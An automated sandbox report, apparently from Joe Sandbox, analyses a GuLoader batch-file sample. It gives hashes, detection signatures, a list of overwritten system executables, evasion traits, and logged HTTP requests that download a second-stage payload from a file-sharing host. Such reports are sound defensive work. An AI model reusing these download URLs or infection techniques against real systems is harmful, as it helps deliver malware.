Windows Analysis Report
las.cmd

Overview

General Information

Sample name: las.cmd
Analysis ID: 1446786
MD5: f96b390af9be44e21ffec109cb107462
SHA1: 716dda50fc30581e587c0a3d8c65d45aefbfec14
SHA256: c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
Tags: cmd

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

Spreading

Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View IP Address: 69.31.136.17 69.31.136.17
Source: Joe Sandbox View IP Address: 172.67.170.105 172.67.170.105
Source: Joe Sandbox View IP Address: 69.31.136.57 69.31.136.57
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n2.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
